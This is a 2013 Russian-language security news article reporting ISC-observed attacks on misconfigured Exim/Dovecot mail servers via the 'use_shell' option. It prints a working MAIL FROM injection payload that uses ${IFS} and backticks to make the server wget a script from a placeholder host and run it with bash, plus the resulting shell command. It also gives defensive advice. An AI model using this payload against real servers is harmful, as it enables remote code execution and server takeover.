Суббота, 15.12.2018
Компьютерная безопасность и новости
Форма входа
Меню сайта
Категории раздела
Компьютерные новости [936]
АнтиВирусные новости [210]
Новости о UNIX/Linux [313]
Магазин цифровых товаров

Ключи и пин-коды

Игры Кредитные карты IP-телефония Интернет провайдеры Мобильная связь Спутниковое ТВ

Электронные книги

Бизнес и экономика Дом, быт, семья, досуг Санкт-Петербург Компьютеры и интернет Наука и образование Техническая литература Юридическая литература

Цифровые товары

iTunes & App Store Базы данных Дизайн Доступ к ресурсам Kарты продления, ключи Фотографии Шаблоны для сайтов

Программное обеспечение

Безопасность Игры PC Интернет Мобильная связь Программирование Продвижение сайтов (SEO) Утилиты
Архив записей
Наши сообщества
Статистика
Рейтинг@Mail.ru

Онлайн всего: 1
Гостей: 1
Пользователей: 0

Код нашего баннера

Поиск
Главная » 2013 » Июль » 31 » ISC: Зафиксированы атаки с использованием связки Exim и Dovecot
00:45
ISC: Зафиксированы атаки с использованием связки Exim и Dovecot

Эксперты Центра противодействия угрозам в Сети (Internet Storm Center, ISC) зафиксировали рост количества атак, совершенных посредством использования уязвимой конфигурации приложений Exim и Dovecot.

По окончанию атаки на сервер устанавливается perl-скрипт /tmp/p.pl, который на подобие IRC-серверов обрабатывает определенные управляющие команды.

В случае использования Exim в качестве почтового сервера, его можно настроить на перенаправление сообщений во внешнюю программу с целью расширить возможности фильтрации и доставки email. Обычная конфигурация содержит агент по доставке писем Dovecot, который поддерживает работу серверов pop3 и imap.

Инфицирование сервера происходит посредством рассылки спам-писем. Они эксплуатируют уязвимость через заголовок Return-Path, обрабатывая который Exim запускает утилиту wget, загружает скрипт и запускает его.

Примером проведенной атаки можно назвать следующее. Так, в случае указания злоумышленником:

MAIL FROM: red`wget${IFS}-O${IFS}/tmp/p${IFS}example.com/test.sh``bash${IFS}/tmp/p`team@example.com

Exim выполнит:

/bin/sh -c "/usr/lib/Dovecot/deliver -e -k -s -f \"red`wget${IFS}-O${IFS}/tmp/p${IFS}example.com/test.sh``bash${IFS}/tmp/p`team@example.com"

Это, в свою очередь, приведет к запуску wget, загрузке внешнего скрипта c сайта example.com/test.sh и его выполнению.

Примечательно, что информация о брешах была опубликована еще в мае текущего года, однако до сих пор остается огромное количество уязвимых серверов.

Пользователям связки Exim и Dovecot следует проверить настройки на предмет отсутствия опции «use_shell», с помощью которой Dovecot передает параметры в командную строку. Благодаря этому злоумышленники могут выполнять системные команды. 
Категория: АнтиВирусные новости | Просмотров: 755 | Рейтинг: 0.0/0
Всего комментариев: 0
Добавлять комментарии могут только зарегистрированные пользователи.
[ Регистрация | Вход ]
Copyright inet-safety © 2018    |    Хостинг от uCoz
Пользовательское Соглашение | Политика Конфиденциальности